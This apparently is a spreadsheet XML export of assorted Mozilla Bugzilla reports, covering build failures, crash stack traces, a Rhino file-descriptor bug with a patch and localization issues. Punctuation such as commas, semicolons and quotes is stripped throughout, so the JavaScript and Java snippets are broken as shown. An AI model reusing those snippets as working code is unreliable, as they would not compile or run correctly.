Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7.8) Gecko/20050511 Firefox/1.0.4
The current mailing list archive system we have doesn't have any sort of search
facility that I can find.  I would very much like to be able to at least search
archives by keyword at at best be able to search with things like date and
author filters and so forth.
Reproducible: Always</t>
  </si>
  <si>
    <t>CORE-405380</t>
  </si>
  <si>
    <t>Unexpected whitespace at right of inline-block</t>
  </si>
  <si>
    <t>Created attachment 290174
testcase
See attached testcase.</t>
  </si>
  <si>
    <t>CALENDAR-400407</t>
  </si>
  <si>
    <t>Conflicting entries in removed-files.in break update process</t>
  </si>
  <si>
    <t>Testing the Sunbird Update (betatest channel) 0.5 -&gt; 0.7 reveals a problem for the Swedish Win32 version. Restarting SB after the Update fails withe an Error Message. Neither different L10n versions nor platforms seem to be affected.
The problem can as well be reproduced by forcing the update locally w. previously downloaded *.mar files. Both *.mar file types seem affected the partials as well as the complete *.mar file.
Steps To Reproduce (STR):
=========================
1. download and install Sunbird 0.5 sv_SE installer.exe
2. edit Program Files/Mozilla Sunbird/defaults/pref/channel_prefs.js and 
3. change 
pref(app.update.channel release) 
to 
pref(app.update.channel betatest)
4. launch SB and trigger Update
Actual Result:
==============
Update is downloaded and installed but after re-start SB displays the following Error Message and refuses to work:
&gt;&gt; XML-tolkningsfel: odefinierad entitet
&gt;&gt; Adress: chrome://calendar/content/calendar.xul
&gt;&gt; Radnummer 80 Kolumn 1:&lt;window id=calendar-window
&gt;&gt;         title=
&gt;&gt;         onload=calendarInit()
&gt;&gt;         onunload=calendarFinish()
&gt;&gt; ^      &lt;menuitem id=list-calendars-context-new
&gt;&gt; ------^      &lt;menuitem label=
&gt;&gt; ------^
Expected Result:
================
SB should start w/o any probs after the Update
Reproducible:
=============
Always</t>
  </si>
  <si>
    <t>CORE-462916</t>
  </si>
  <si>
    <t>Update to liboggplay r3761 to pick up ability to compute Ogg duration</t>
  </si>
  <si>
    <t>liboggplay track ticket 424 (see url) has landed which allows calculating the duration of an Ogg file. We need this for bug 449307.</t>
  </si>
  <si>
    <t>CALENDAR-385572</t>
  </si>
  <si>
    <t>sunbird.exe is compiled with incorrect Product Version information</t>
  </si>
  <si>
    <t>Created attachment 269497
rev0 - override product version with app version (TRUNK patch)
sunbird.exe is compiled with incorrect Product Version information
This bug is the equivalent of Firefox/Thunderbird Bug 286825 and SeaMonkey Bug 302401.</t>
  </si>
  <si>
    <t>GRENDEL_GRAVEYARD-304960</t>
  </si>
  <si>
    <t>GRENDEL_GRAVEYARD</t>
  </si>
  <si>
    <t>Mail Accounts types must not be changable.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-GB rv:1.7.10) Gecko/20050717 Firefox/1.0.6
Build Identifier: 
Mail Accounts types must be immutable.
It doesn't make sense to be allowed to change your News server into a POP3
server simply by changing a flag.
They should remain separate types from creation to deletion.
It maybe that an option is provided to convert between account types but this
is should be handled as create new account copy relevant settings add new
settings delete old account.
Reproducible: Always</t>
  </si>
  <si>
    <t>kieran.maclean</t>
  </si>
  <si>
    <t>CORE-382399</t>
  </si>
  <si>
    <t>investigate mac reftest failures caused by off-by-1 color errors with some borders</t>
  </si>
  <si>
    <t>When I landed bug 368247 a few reftests failed on the mac tinderbox:
bugs/84400-2.html
bugs/210876-1.html
bugs/339289-1.html
bugs/362901-1.html
Visually all of these look identical it seems that they all use a  which is rendered using a 2px groove style.  In one of them the top left and bottom right corner pixels (2 pixels total) have a color value 1 RGB value higher than the reference rendering.  I have no idea why the CSS looks identical in all cases.
I can't investigate this right now but I'll take a look when I have a mac next week marking these as xfail for now.</t>
  </si>
  <si>
    <t>CORE-502103</t>
  </si>
  <si>
    <t xml:space="preserve">Crash [@ NS_NewEditorKeyListener] with </t>
  </si>
  <si>
    <t>Created attachment 386619
testcase
See testcase which crashes current trunk build when you have the html5.enable pref set to true.
http://crash-stats.mozilla.com/report/index/5619793a-b24e-4818-999e-05d5a2090702
0  	kernel32.dll  	kernel32.dll@0x12afb  	
1 	mozcrt19.dll 	_CxxThrowException 	throw.cpp:159
2 	mozcrt19.dll 	operator new 	obj-firefox/memory/jemalloc/crtsrc/new.cpp:57
3 	xul.dll 	NS_NewEditorKeyListener 	editor/libeditor/text/nsEditorEventListeners.cpp:888
4 	xul.dll 	nsPlaintextEditor::CreateEventListeners 	editor/libeditor/text/nsPlaintextEditor.cpp:305
5 	xul.dll 	nsEditor::PostCreate 	editor/libeditor/base/nsEditor.cpp:295
6 	xul.dll 	nsTextControlFrame::InitEditor 	layout/forms/nsTextControlFrame.cpp:1583
7 	xul.dll 	nsTextControlFrame::DelayedEditorInit 	layout/forms/nsTextControlFrame.cpp:1357</t>
  </si>
  <si>
    <t>TAMARIN_GRAVEYARD-413498</t>
  </si>
  <si>
    <t>Rudimentary support for finally clauses</t>
  </si>
  <si>
    <t>Created attachment 298473
Patch
Supports basic finally handling.  Does not support break continue or return past a finally clause -- the verifier has real problems with these (even in ASC according to Erik).  A syntax error is thrown if the program tries to do this.</t>
  </si>
  <si>
    <t>CORE-361377</t>
  </si>
  <si>
    <t>Performance regression with this testcase which continuously reloads a page</t>
  </si>
  <si>
    <t>I was hoping that I could find a possible regression in performance for bug 360789 but I didn't see that.
But I see with the testcase that I made a performance regression when cairo was turned on on windows.
So that's why I'm filing this bug. It might not be the most useful testcase but it's probably useful to keep track of it to ensure that the performance will turn back into pre-cairo days.</t>
  </si>
  <si>
    <t>BUGZILLA-476943</t>
  </si>
  <si>
    <t>Edit multiple issues token after switching to shadow DB</t>
  </si>
  <si>
    <t>As part of the fix to Bug 466748 a token is now generated in buglist.cgi. This is done after the switch to the shadow db meaning that issue_token tries to write the token to the shadow database. If the shadow is in readonly mode (as it should be) this will fail with the following error:
DBD::mysql::db do failed: The MySQL server is running with the --read-only option so it cannot execute this statement [for Statement INSERT INTO tokens (userid issuedate token tokentype eventdata)
        VALUES (? NOW() ? ? ?)] at Bugzilla/Token.pm line 418
	Bugzilla::Token::_create_token(9 'session' 'buglist_mass_change') called at Bugzilla/Token.pm line 173
	Bugzilla::Token::issue_session_token('buglist_mass_change') called at /shared/bugzilla/docroot/buglist.cgi line 1252</t>
  </si>
  <si>
    <t>CORE-429657</t>
  </si>
  <si>
    <t>Local xml file does not load anymore with JavaScript in FF 3 beta 5 (No problems with FF 2)</t>
  </si>
  <si>
    <t xml:space="preserve">User-Agent:       Mozilla/4.0 (compatible MSIE 7.0 Windows NT 5.1 .NET CLR 2.0.50727 InfoPath.1 .NET CLR 1.1.4322)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 nl rv:1.9b5) Gecko/2008032620 Firefox/3.0b5
It seems that there is a problem with xmlDoc.load(...) because the data within the xml file I parse doesn't show on the page in FF3 beta5.
Reproducible: Always
Steps to Reproduce:
1.Load html file (autos.html) ex: file:///D:/Mijn%20Documenten/MCT2/Voorbeelden/XML/Hoofdstuk%205/Autos/autos.html
2.
3.
Actual Results:  
Overzicht
Expected Results:  
Overzicht
. Porche 911 GT2
. Ferrari Enzo
. Lamborghini Diablo
auto.html code:
&lt;!DOCTYPE html
     PUBLIC -//W3C//DTD XHTML 1.0 Strict//EN
     http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd&gt;
    Overzicht auto's
    Overzicht
auto.js code:
window.onload = showHTML
function loadXMLDoc(filename) {
    var xmlDoc
    if (window.ActiveXObject) {
        xmlDoc = new ActiveXObject(Microsoft.XMLDOM)
    }
    else if (document.implementation &amp;&amp; document.implementation.createDocument) {
        xmlDoc = document.implementation.createDocument(  null)
    }
    else {
        alert('Geen JavaScriptondersteuning gevonden!')
    }
    xmlDoc.async = false
    xmlDoc.load(filename)
    return xmlDoc
}
function showHTML() {
   var xmlDoc = loadXMLDoc(autos.xml)
   var autos = xmlDoc.getElementsByTagName('auto')
   var autoLijst = document.getElementById('autolijst')
   for (i = 0 i &lt; autos.length i++) {
       var listItem = 
       listItem += autos[i].attributes[0].nodeValue
       listItem +=  
       listItem += autos[i].childNodes[0].nodeValue
       listItem += 
       autoLijst.innerHTML += listItem
   }
}
auto.xml code:
    911 GT2
    Enzo
    Diablo
</t>
  </si>
  <si>
    <t>krbehiels</t>
  </si>
  <si>
    <t>CORE-36510</t>
  </si>
  <si>
    <t>[trk] (DOM2 StyleSheets) MediaList</t>
  </si>
  <si>
    <t>Doesn't exist in mozilla yet.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-255364</t>
  </si>
  <si>
    <t>[german help] Translate ssl_help.xhtml</t>
  </si>
  <si>
    <t>Beginne mit der Ãœbersetzung</t>
  </si>
  <si>
    <t>simon.chuuk</t>
  </si>
  <si>
    <t>CORE-343270</t>
  </si>
  <si>
    <t>Debug only crash [@ IncrementalReflow::AddCommand] with display: table-row-group and display: table-caption</t>
  </si>
  <si>
    <t>See upcoming testcase which crashes in my debug build (and that one is up to date).
Regular trunk builds don't seem to crash.
Maybe related to bug 341858?
Also I get the assertions which a bug has been filed about in bug 337476.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-96722</t>
  </si>
  <si>
    <t>Nightly builds for sparc solaris are out of date</t>
  </si>
  <si>
    <t>-rwxrwxr-x   1 22       22       11846119 Aug 17 13:43
mozilla-sparc-sun-solaris2.6.tar.gz*</t>
  </si>
  <si>
    <t>NSS-307848</t>
  </si>
  <si>
    <t>Build error: coreconf/config.mk: No such file or directory</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8b4) Gecko/20050908 Firefox/1.4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8b4) Gecko/20050908 Firefox/1.4
I download the latest source code from CVS server and try to build the Firefox.
This is my .mozconfig file when built Firefox:
. $topsrcdir/browser/config/mozconfig
export BUILD_OFFICIAL=1
export MOZILLA_OFFICIAL=1
mk_add_options MOZ_CO_PROJECT=browser
mk_add_options BUILD_OFFICIAL=1
mk_add_options MOZILLA_OFFICIAL=1
ac_add_options --enable-shared
ac_add_options --disable-static
ac_add_options --disable-activex
ac_add_options --disable-activex-scripting
ac_add_options --disable-mailnews
ac_add_options --disable-calendar
ac_add_options --disable-xinerama
ac_add_options --disable-ctl
ac_add_options --disable-mathml
ac_add_options --disable-ldap-experimental
ac_add_options --disable-tests
ac_add_options --disable-gtktest
ac_add_options --enable-debug
ac_add_options --enable-strip
ac_add_options --enable-strip-libs
ac_add_options --disable-toolkit-gtk
ac_add_options --disable-toolkit-xlib
ac_add_options --disable-toolkit-qt
ac_add_options --disable-accessibility
ac_add_options --disable-installer
ac_add_options --disable-optimize
Reproducible: Always
Steps to Reproduce:
1. Start cygwin and change current directory to the Firefox source code root.
2. type make -f client.mk build
3. build some source source always be passed but failed on building
security\nss\lib\freebl
Actual Results:  
The following is the segment of the output:
lib -NOLOGO -OUT:d:/firefox/mozilla/mozilla/nss/freebl/freebl.lib d:\\firefox\
\mozilla\\mozilla\\nss\\freebl\\loader.obj
echo d:/firefox/mozilla/mozilla/nss/freebl/freebl.lib
d:/firefox/mozilla/mozilla/nss/freebl/freebl.lib
nsinstall -m 664 d:/firefox/mozilla/mozilla/nss/freebl/freebl.lib d:/firefox/moz
illa/mozilla/dist/lib
mkdir d:/firefox/mozilla/mozilla/nss/freebl/WIN95_SINGLE_SHLIB
cp /cygdrive/d/firefox/mozilla/mozilla/security/nss/lib/freebl/Makefile d:/firef
ox/mozilla/mozilla/nss/freebl/WIN95_SINGLE_SHLIB
cp /cygdrive/d/firefox/mozilla/mozilla/security/nss/lib/freebl/manifest.mn d:/fi
refox/mozilla/mozilla/nss/freebl/WIN95_SINGLE_SHLIB
cp /cygdrive/d/firefox/mozilla/mozilla/security/nss/lib/freebl/config.mk d:/fire
fox/mozilla/mozilla/nss/freebl/WIN95_SINGLE_SHLIB
cd d:/firefox/mozilla/mozilla/nss/freebl/WIN95_SINGLE_SHLIB &amp;&amp; /usr/bin/make -j1
 FREEBL_CHILD_BUILD=1 \
 FREEBL_PARENT=../.. CORE_DEPTH=../../../../.. libs
make[6]: Entering directory `/cygdrive/d/firefox/mozilla/mozilla/nss/freebl/WIN9
5_SINGLE_SHLIB'
Makefile:51: ../../../../../coreconf/config.mk: No such file or directory
Makefile:365: ../../../../../coreconf/rules.mk: No such file or directory
Expected Results:  
Can build Firefox with shared libraries.
When I try to modify the nss\lib\manifest.mn to remove the freebl module. It is
successful util run shlibsign to sign softokn3.dll with error IO error occurred.</t>
  </si>
  <si>
    <t>hhf</t>
  </si>
  <si>
    <t>BUGZILLA-281185</t>
  </si>
  <si>
    <t>Add boolean charts docs</t>
  </si>
  <si>
    <t>SEAMONKEY-98593</t>
  </si>
  <si>
    <t>Build ID in Warpzilla 0.9.2.1+ in Titlebar is Incorrect</t>
  </si>
  <si>
    <t>The Build ID says all 0's instead of 20010904</t>
  </si>
  <si>
    <t>barryma22</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-417619</t>
  </si>
  <si>
    <t>Make search result order same regardless of search term case</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-504356</t>
  </si>
  <si>
    <t>[DE] Keyboard shortcut problem in Library search of Firefox 3.5</t>
  </si>
  <si>
    <t>Created attachment 388734
Lesezeichen-MenÃ¼ (O)
When searching for strings in the library window of Firefox 3.5 and when Lesezeichen-MenÃ¼ is marked in the left sidebar then a single (O) appears in the search restriction bar (where you can choose between Lesezeichen Chronik or Lesezeichen-MenÃ¼).
I will attach a screenshot.
Can we change the shurtcut to kill this (O)?</t>
  </si>
  <si>
    <t>CORE-249923</t>
  </si>
  <si>
    <t>Code size reduction / speed up of nsViewManager class</t>
  </si>
  <si>
    <t>A little more work in nsViewManager.cpp:
I removed the nsHashtable from the nsViewManager class.  It was only used by two
methods both of which were called from a common parent.  I create the hash
table on the stack now and pass it down to the functions that use it.
I removed the method DestroyZTreeNode().  It was only called from
ReparentViews() and all it did was to remove nodes from the hash table.  I do
not think it is necessary to remove these nodes.  They will all die anyway when
ReparentViews returns and the hash is destroyed.  However I am not that
familiar with this code and would appreciate feedback on this.
tricia&gt; size old/nsViewManager.o nsViewManager.o
   text    data     bss     dec     hex filename
  32691     396      20   33107    8153 old/nsViewManager.o
  32363     396      20   32779    800b nsViewManager.o
It is definitly smaller and probably faster too.</t>
  </si>
  <si>
    <t>jim_nance</t>
  </si>
  <si>
    <t>FIREFOX-413504</t>
  </si>
  <si>
    <t>Locking browser.startup.homepage should prevent drag/drop to the Home icon</t>
  </si>
  <si>
    <t>When you lock the homepage preference the home button should not function as a drop target.
Even though the change is not saved it looks to the user like it is.</t>
  </si>
  <si>
    <t>RHINO_GRAVEYARD-368323</t>
  </si>
  <si>
    <t>Global class's runCommand suffers from Bad file descriptor IOExceptions on extra close() calls</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux x86_64 en-US rv:1.8.0.9) Gecko/20070102 Ubuntu/dapper-security Firefox/1.5.0.9
Build Identifier: Rhino 1.6 release 5
When using the org.mozilla.javascript.tools.shell.Global.runCommand method (via calls to runCommand(...) in the Rhino shell) after a number of calls an IOException (bad file descriptor) occurs.
Example stack trace for when this Exception occurs:
org.mozilla.javascript.WrappedException: Wrapped java.io.IOException: Bad file descriptor (runCommandBug.js#10)
        at org.mozilla.javascript.Context.throwAsScriptRuntimeEx(Context.java:1693)
        at org.mozilla.javascript.MemberBox.invoke(MemberBox.java:160)
        at org.mozilla.javascript.FunctionObject.call(FunctionObject.java:408)
        at org.mozilla.javascript.optimizer.OptRuntime.callName(OptRuntime.java:97)
        at org.mozilla.javascript.gen.c1._c0(runCommandBug.js:10)
        at org.mozilla.javascript.gen.c1.call(runCommandBug.js)
        at org.mozilla.javascript.ContextFactory.doTopCall(ContextFactory.java:340)
        at org.mozilla.javascript.ScriptRuntime.doTopCall(ScriptRuntime.java:2758)
        at org.mozilla.javascript.gen.c1.call(runCommandBug.js)
        at org.mozilla.javascript.gen.c1.exec(runCommandBug.js)
        at org.mozilla.javascript.tools.shell.Main.evaluateScript(Main.java:503)
        at org.mozilla.javascript.tools.shell.Main.processFileSecure(Main.java:425)
        at org.mozilla.javascript.tools.shell.Main.processFile(Main.java:391)
        at org.mozilla.javascript.tools.shell.Main.processSource(Main.java:382)
        at org.mozilla.javascript.tools.shell.Main.processFiles(Main.java:179)
        at org.mozilla.javascript.tools.shell.Main$IProxy.run(Main.java:100)
        at org.mozilla.javascript.Context.call(Context.java:528)
        at org.mozilla.javascript.ContextFactory.call(ContextFactory.java:450)
        at org.mozilla.javascript.tools.shell.Main.exec(Main.java:162)
        at org.mozilla.javascript.tools.shell.Main.main(Main.java:140)
Caused by: java.io.IOException: Bad file descriptor
        at java.io.FileInputStream.close0(Native Method)
        at java.io.FileInputStream.close(FileInputStream.java:245)
        at org.mozilla.javascript.tools.shell.Global.runProcess(Global.java:774)
        at org.mozilla.javascript.tools.shell.Global.runCommand(Global.java:536)
        at sun.reflect.GeneratedMethodAccessor2.invoke(Unknown Source)
        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
        at java.lang.reflect.Method.invoke(Method.java:585)
        at org.mozilla.javascript.MemberBox.invoke(MemberBox.java:145)
        ... 18 more
(Line 774 is the line with errProcess.close():
  } finally {
      if (errProcess != null) {
          errProcess.close()
      }
  }
)
Looking in to this my best guess (I wish I could provide insight that was more certain than a guess...) is that following the call to .close() done in the pipe() method the errProcess stream gets cleaned up and its underlying file descriptor is destroyed thus this exception on this later (second) call to close().
If this call to errProcess.close() is commented out the same exception would occur but via the call to in.close() on line 744: (
  pipe(false in inProcess)
  in.close()
)
I suspect (though didn't actually encounter) this exception could also happen on line 769's call to outProcess.close().
Reproducible: Always
Steps to Reproduce:
run rhino runCommandBug.js where the file runCommandBug.js consists of:
var i = 0
while (true) {
    i += 1
    print(\nA -  + i)
    runCommand(ls -w 0)
    print(\nB -  + i)
    runCommand(ls -w 1)
}
Actual Results:  
IOException (Bad file descriptor) would occur around the 30th iteration of the loop. (Sometimes the exception would not occur until after several hundred iterations though.)
Expected Results:  
Exception-free execution
Environment information:
$ java -version
java version 1.5.0_06
Java(TM) 2 Runtime Environment Standard Edition (build 1.5.0_06-b05)
Java HotSpot(TM) 64-Bit Server VM (build 1.5.0_06-b05 mixed mode)
$ cat /proc/version
Linux version 2.6.15-27-amd64-generic (buildd@king) (gcc version 4.0.3 (Ubuntu 4.0.3-1ubuntu5)) #1 SMP PREEMPT Fri Dec 8 17:50:54 UTC 2006
===
Possible workaround:
I am using a patched version of the Global class based on the source from rhino1_6R5.zip which seems to be working fine for me. Below is a diff between my patched version and the original:
diff toolsrc/org/mozilla/javascript/tools/shell/Global.java.orig toolsrc/org/mozilla/javascript/tools/shell/Global.java
744c744746
&lt;                             in.close()
---
&gt;
&gt;                             closeAndIgnoreBadFileDesciptor(in)
&gt;
769c771
&lt;                         outProcess.close()
---
&gt;                         closeAndIgnoreBadFileDesciptor(outProcess)
774c776
&lt;                     errProcess.close()
---
&gt;                     closeAndIgnoreBadFileDesciptor(errProcess)
793a796809
&gt;     static void closeAndIgnoreBadFileDesciptor(InputStream stream)
&gt;             throws IOException {
&gt;
&gt;         try {
&gt;             stream.close()
&gt;         }
&gt;         catch (IOException e) {
&gt;             final String msg = e.getMessage()
&gt;             if (! msg.startsWith(Bad file descriptor) )
&gt;                 throw e
&gt;         }
&gt;
&gt;     }
&gt;</t>
  </si>
  <si>
    <t>krouskop+mozillabugzilla</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-248543</t>
  </si>
  <si>
    <t>Please add my Open Long Urls extension to update.mozilla.org</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040614 Firefox/0.9
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040614 Firefox/0.9
Name: Open Long Urls
XPI: http://jgillick.nettripper.com/openlongurl/openlongurl.xpi
Size: 5 KB
Version: 0.1
Released: 6/24/2004
Author: Jeremy Gillick
Email: moz_jg@yahoo.com
Homepage: http://jgillick.nettripper.com/
Description: 
This adds an option to your File menu that allows you to open URLs that span
several lines. It solves the problem of long urls recieved in email that has
been broken up onto two or more lines.
Thanks
Jeremy
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>MINIMO_GRAVEYARD-194303</t>
  </si>
  <si>
    <t>[minimo] custom component registry</t>
  </si>
  <si>
    <t>CORE-53074</t>
  </si>
  <si>
    <t>Assertion when forward aborted a load</t>
  </si>
  <si>
    <t>FreeBSD 4.1 20000918xx
Looked at list of bugzilla bugs.  Selected a bug.  Typed some text into
Description. Hit back.  Before the page finished loading hit forward.  Got an
assertion in nsMultiMixedConv::~nsMultiMixedConv() about the buffer not being
empty (all buffered data should be gone).  The buffered data was:
  mBuffer = 0x8910260 _whiteboard=&amp;stat 
  mBufLen = 17
See attachment for full details (gdb backtrace *this dump).
Repeatable</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-443301</t>
  </si>
  <si>
    <t>Reboot several talos machines</t>
  </si>
  <si>
    <t>I'd like to see qm-mini-xp01 qm-mini-xp02 qm-mini-xp03
qm-pxp-trunk01 qm-pxp-trunk02 qm-pxp-trunk03 qm-pvista-trunk01
qm-pvista-trunk02 and qm-pvista-trunk03 rebooted.  See bug 442949 for details.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-117878</t>
  </si>
  <si>
    <t>[meta] evaluate mailnews code for buffer overruns.</t>
  </si>
  <si>
    <t>evaluate mailnews code for buffer overruns.
I'd start by looking for all calls to sprintf() and replace them with calls to
PR_snprintf().
I'd start with the ones that don't have this:
/* Reviewed 4.51 safe use of sprintf */
and if you have time perhaps re-review those and update the comment to reflect
that we've reviewed it in the mozilla tree.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-316691</t>
  </si>
  <si>
    <t>Support UI bindings for derived datatypes</t>
  </si>
  <si>
    <t>As it is now we need to target each XML Schema type directly in CSS like we do for f.x. upload:
---- CUT ---
upload {
  -moz-binding: url('chrome://xforms/content/xforms.xml#xformswidget-upload-disabled')
}
upload[mozType|type=http://www.w3.org/2001/XMLSchema#anyURI] {
  -moz-binding: url('chrome://xforms/content/xforms.xml#xformswidget-upload')
}
---- CUT ---
Problem is that f.x. range has a lot of datatypes that it supports (see bug 316354). So with our current design we would need a specific binding for each (and would still not support user defined types). That's not a good solution.
This means we need a method to find the primitive datatype that a datatype is derived by restrition from. I've tried to stay at a distance from XML Schema so I do not know 1) if that's possible at all and 2) how expensive that will be.
Assuming that its possible I see two solutions:
1) Continue along the same path and use two attribute to bind via CSS:
A @type (as we do now) and a @baseType. @baseType should then be set to the primitive datatype the @type is derived by restriction from.
2) Have the basetype check in the C++ part of f.x. range
We could then find the basetype and set the @type attribute to that instead or invalid if it's unsupported. A problem could be if somebody wanted to do a range for an abitrary data type (although this is invalid per the spec).
(another solution could be to push the responsability to the UI control but I'm not keen on that)
Assuming that we can figure out the basetype I'm for solution 1).</t>
  </si>
  <si>
    <t>FIREFOX-330054</t>
  </si>
  <si>
    <t>Add Bookmark dialog allows non-bookmark folders to be selected</t>
  </si>
  <si>
    <t>Currently the Add Bookmark dialog allows the selection of non-writable bookmark folders (though it doesn't actually try to add the new bookmark to them)</t>
  </si>
  <si>
    <t>CALENDAR-502936</t>
  </si>
  <si>
    <t>cached calendars should not be refreshed at launch/startup time</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux x86_64 fr rv:1.9.0.11) Gecko/2009061317 Iceweasel/3.0.11 (Debian-3.0.11-1)
Build Identifier: 20090707041124
When calendars are cached a getItems is performed on them when the views become available and again when the calendar triggers the onLoad notification. The attached patch prevent getItems() operations on such calendars as long as the onLoad has not been posted. This enhances responsitivity and load time when a couple of cached calendars are configured.
Reproducible: Always</t>
  </si>
  <si>
    <t>mohit.kanwal</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-478660</t>
  </si>
  <si>
    <t>[sr] Strings should have 3 forms in plural rule #7</t>
  </si>
  <si>
    <t>The following strings should have 3 forms according to plural rule #7.
Correct ex. |downloadsTitleFiles|
http://hg.mozilla.org/releases/l10n-mozilla-1.9.1/sr/file/tip/toolkit/chrome/mozapps/downloads/downloads.properties#l110
|newAddonsNotificationMsg2|
http://hg.mozilla.org/releases/l10n-mozilla-1.9.1/sr/file/tip/toolkit/chrome/mozapps/extensions/extensions.properties#l100
|activeDownloads| |pausedDownloads|
http://hg.mozilla.org/releases/l10n-mozilla-1.9.1/sr/file/tip/browser/chrome/browser/browser.properties#l129
|editBookmark.removeBookmarks.label|
http://hg.mozilla.org/releases/l10n-mozilla-1.9.1/sr/file/tip/browser/chrome/browser/browser.properties#l141</t>
  </si>
  <si>
    <t>CORE-418311</t>
  </si>
  <si>
    <t>mac coalesced updates causing slowdown</t>
  </si>
  <si>
    <t>Created attachment 304107
add plist key
We'll fix this properly once we do Compositor but for 1.9 we need to just disable Coalesced Updates we paint way too often and with it enabled we end up blocking quite a lot on graphics updates.
(ref: http://developer.apple.com/technotes/tn2005/tn2133.html)</t>
  </si>
  <si>
    <t>TOOLKIT-406445</t>
  </si>
  <si>
    <t>Notification button callback/popup doesn't know which button was clicked</t>
  </si>
  <si>
    <t>For bug 393120 we want to be able to have to active notificationbox elements each with an active notification each capable of displaying a popup. Our issue is that if you use the popup-based notification directly then the popup has no information at all as to why it is being shown while if you use the callback then although you know which notification's button was pressed you don't know where that button is so that you can't position your popup relative to it.
I've been trying to think of some options. For instance if document.popupNode was set to the button while the popup is being opened then we could use document.getBindingParent to find the notification and notifcationbox. Another possibility is to specify the popup as a XUL element which in our case would be part of our notificationbox xbl. Another idea I had was to clone the popup and append it as a child of the button and use type=menu. I mention this because the popup doesn't behave like a normal menubutton although it resembles one. (I discovered one workaround for this was not to put the popup in a popupset.)
Feel free to chime in with your own ideas even if you do like one of mine!</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-253089</t>
  </si>
  <si>
    <t>[Comments] Ability for commenters to leave email address</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7) Gecko/20040626 Firefox/0.9.1
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7) Gecko/20040626 Firefox/0.9.1
Sometimes authors of comments use the comment thingy to provide bug reports or
write down if they've problems installing the theme or extension. It would be
nice  if comment authors can add an e-mail when they write the comments. This
will be helpfull for theme or extension authors to have a contact person. Maybe
scramble the e-mail a bit to avoid spam-robots to harvest them.
Reproducible: Always
Steps to Reproduce:
1. goto http://update.mozilla.org
2. pick an extension or theme you like and click on the comment link
3. add a comment</t>
  </si>
  <si>
    <t>BUGZILLA-334344</t>
  </si>
  <si>
    <t>process_bug.cgi is broken when changing several bugs at once</t>
  </si>
  <si>
    <t>This is a regression due to bug 303696. @values is not handled correctly when changing several bugs at once. The bug ID is appended to the existing list of values at each loop so that the second bug has now the ID bug1 ID bug2 ID instead of bug2 ID only.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-502531</t>
  </si>
  <si>
    <t>scratchbox is broken on linux staging slaves</t>
  </si>
  <si>
    <t>Trying to run '/scratchbox/moz_scratchbox' on these machines dies with
  /scratchbox/moz_scratchbox: line 11: /scratchbox/login: Permission denied
  program finished with exit code 126
which is kinda fatal when trying to compile. Note that a separate error on moz2-linux-slave17 with the m-c checkout was breaking Maemo mozilla-central l10n should be fixed now that I nuked that dir. And Maemo mozilla-1.9.1 is busted without l10n.mk.
Looks like fallout from Puppet based on bug 486614 comment #6 and when Maemo mozilla-central build stopped working:
# (Jun 24 12:44) rev=[??] failure Maemo mozilla-central build #210: failed compile
# (Jun 24 09:47) rev=[??] success Maemo mozilla-central build #209: build successful</t>
  </si>
  <si>
    <t>CORE-453880</t>
  </si>
  <si>
    <t>clean up plugin entries in toolkit-makefiles.sh</t>
  </si>
  <si>
    <t>The list of Makefiles in http://mxr.mozilla.org/comm-central/source/mozilla/toolkit/toolkit-makefiles.sh#340 hasn't been updated for the changes in bug 360955 so we get this in configure:
updating modules/plugin/samples/simple/Makefile
can't read /mnt/mozilla/comm-central/mozilla/modules/plugin/samples/simple/Makefile.in: No such file or directory
updating modules/plugin/samples/SanePlugin/Makefile
can't read /mnt/mozilla/comm-central/mozilla/modules/plugin/samples/SanePlugin/Makefile.in: No such file or directory
updating modules/plugin/tools/sdk/Makefile
can't read /mnt/mozilla/comm-central/mozilla/modules/plugin/tools/sdk/Makefile.in: No such file or directory
updating modules/plugin/tools/sdk/samples/Makefile
can't read /mnt/mozilla/comm-central/mozilla/modules/plugin/tools/sdk/samples/Makefile.in: No such file or directory
updating modules/plugin/tools/sdk/samples/common/Makefile
can't read /mnt/mozilla/comm-central/mozilla/modules/plugin/tools/sdk/samples/common/Makefile.in: No such file or directory
updating modules/plugin/tools/sdk/samples/basic/windows/Makefile
can't read /mnt/mozilla/comm-central/mozilla/modules/plugin/tools/sdk/samples/basic/windows/Makefile.in: No such file or directory
updating modules/plugin/tools/sdk/samples/scriptable/windows/Makefile
can't read /mnt/mozilla/comm-central/mozilla/modules/plugin/tools/sdk/samples/scriptable/windows/Makefile.in: No such file or directory
updating modules/plugin/tools/sdk/samples/simple/Makefile
can't read /mnt/mozilla/comm-central/mozilla/modules/plugin/tools/sdk/samples/simple/Makefile.in: No such file or directory
updating modules/plugin/tools/sdk/samples/winless/windows/Makefile
